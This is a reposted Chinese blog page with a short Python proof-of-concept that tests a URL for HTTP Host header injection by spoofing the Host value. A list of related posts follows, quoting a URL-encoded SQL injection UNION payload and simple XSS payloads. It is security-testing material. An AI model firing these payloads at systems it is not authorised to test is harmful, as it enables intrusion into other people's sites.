python3基础学习(http host头攻击漏洞POC)

最新推荐文章于 2024-10-11 16:45:24 发布
转载 最新推荐文章于 2024-10-11 16:45:24 发布 · 545 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/505469
文章标签:

#python

本文提供了一个简单的HTTP Host头攻击漏洞POC代码示例,通过修改请求头部的Host字段来触发潜在的安全问题。使用Python实现,适用于HTTP请求。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  简单版http host头攻击漏洞POC,没有对异常进行处理,没有对意外情况进行处理,所以是简单版!代码如下:

from urllib import request
import sys
import re
url=sys.argv[1]
header={'Host' : 'www.eth10.com'}

req=request.Request(url,headers=header)
u = request.urlopen(req)
resp = u.read()

if re.match('.*www.eth10.com',str(resp)):
    print('漏洞存在')
else:
    print('不存在该漏洞')

  使用语法:python3 host.py URL,URL格式为:http://xx.xx.xx


本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/2052582


Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 6243
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXP,Exploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
漏洞复现】WookTeam searchinfo SQL注入漏洞 POC
qq_48368964的博客
08-20 7269
where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cmd5%28123456%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23`: 这是请求的URL,包含了一个查询参数`where[username]`,其值为一个SQL注入攻击的尝试。这个值试图执行一个UNION查询,将原始查询的结果与另一个查询的结果合并,从而获取更多的信息。需要注意的是,这个请求中包含了一个SQL注入攻击的尝试,这是一种常见的安全漏洞
XSS跨站脚本攻击(内含poc)----自用笔记
weixin_59114667的博客
02-22 401
仅仅是自已用,无别的想法(doge)
python3基础学习http host***漏洞POC
weixin_33737134的博客
12-20 397
  简单版http host***漏洞POC,没有对异常进行处理,没有对意外情况进行处理,所以是简单版!代码如下: from urllib import request import sys import re url=sys.argv[1] header={'Host' : 'www.eth10.com'} req=request.Request(url,headers=header) u ...
开发 Python 项目,要注意这 3个安全漏洞
Mankel
11-25 485
最近在一个 Python Web 项目中处理了 3 个安全漏洞。 在修复完毕之后,来给大家简单地总结分享一下,以提高大家在程序编写和项目开发中的安全意识。 1.YAML文件解析漏洞 在项目中,我们使用了 Python 的 yaml 模块来解析用户上传文件中的.yaml文件,在之前的代码中我们使用了如下的代码对.yaml文件进行读取和解析: import yaml yaml.load(yaml_file) 实际上,这样做会带来很大的安全风险。正常情况下,yaml会按照特定的解析规则对 yaml文件的内容进行
xss poc
cnbird's blog
03-15 806
Ajax Worm - Proof of Concept http://myappsecurity.blogspot.com/2006/12/ajax-worm-proof-of-concept.html Ajax Sniffer - Prrof of concept http://myappsecurity.blogspot.com/2007/01/ajax-sniffer-pr
python写注入漏洞poc
weixin_30552811的博客
04-30 449
webug靶场一道简单的注入题 加点后报错 could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line...
discuz7.2漏洞复现--python编写poc
m0_65129142的博客
12-21 1231
环境搭建 准备一台win7装上的phpstudy 将discuz7.2源码放进去 安装discuz之前,需要先安装center 文件夹搭建存放的位置是: 解压完成之后更改名称 再然后需要把ucenter放到discuz源码下边 开始安装 安装discuz之前 首先需要安装ucenter 我们先将源码拉进phpstudy根目录下边 首先安装ucenter 需要填的只有标红框的 安装完成之后 我们进行安装2 最关键的一步来了 需要将ucenter的url修改成http://192.168.
漏洞poc集合
最新发布
03-26
### Jenkins RCE 漏洞 PoC 示例集合 以下是几个常见的漏洞 PoC 示例集合,涵盖了不同类型的漏洞及其对应的验证方法: #### SQL 注入漏洞 POC 脚本 以下是一个简单的 SQL 注入漏洞 POC 脚本示例,用于验证目标系统...
POC下载】泛微*-Mobile cdnfile 任意文件读取漏洞【0day】
苏诺木安全团队
10-11 478
POC下载】泛微*-Mobile cdnfile 任意文件读取漏洞【0day】
python DVWAXSSPOC练习
weixin_56537388的博客
09-10 418
【代码】python DVWAXSSPOC练习。
XSS漏洞poc与exp
bamanju0574的博客
09-01 1096
poc <script>alert('xss')</script> 最简单常用的poc <a href='' onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗 <img src=http://1.1.1.1/a.ipg onerror=alert('...
检测到目标url存在http host攻击漏洞_原创干货 | 认识CORS漏洞
weixin_39777540的博客
12-15 738
点击上方蓝色字关注我们~前 言CORS漏洞其中已经存在很久了,但是国内了解的人不是很多,文章更是少只有少,漏洞平台也没有此分类。在DefConChina中,陈建军分享的议题中解释的更清楚,有意向的可以找PPT或者视频owasp内的详细介绍http://blog.securelayer7.net/owasp-top-10-security-misconfiguration-5-cors-v...
HTTP host攻击的技术
热门推荐
u012903926的专栏
08-15 2万+
一个有漏洞的JSP代码案例: 使用HTTP代理工具,如BurpSuite篡改HTTP报文部中HOST字段时,加红框中变量即客户端提交的HOST值,该值可被注入恶意代码。 request.getServerName( )方法引用HTTP报文部中HOST字段 该值在http1.0还会影响到Location的值 Location 是用来重定向接收方到非请求URL的位置来完成请求或标识新的...
python搭建HTTP代理 和 使用HTTP代理
SAGGITARXM
02-03 5692
【代码】python搭建HTTP代理 和 使用HTTP代理。
python 爬虫知识点 (http 基础
qq_37634812的博客
10-11 608
1   dns     可以把网址解析成ip地址; 2   robots.txt     爬虫权限:规定爬虫可以爬取的内容,但是并不是懂遵守的,大型搜索引擎公司都是遵守的 3 HTTPHTTPS HTTP协议(HyperText Transfer Protocol,超文本传输协议):是一种发布和接收 HTML页面的方法。 HTTPS(Hypertext Transfer Pr
python 获取url的host
cugb1004101218的专栏
06-15 1万+
import urllib protocol, s1 = urllib.splittype('http://www.freedom.com:8001/img/people') # ('http', '//www.freedom.com:8001/img/people') host, s2= urllib.splithost(s1) # ('www.freedo
Nginx 配置解决host攻击漏洞
如果说你每一步都细心的话,其实你的效率是很快的
10-30 1万+
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值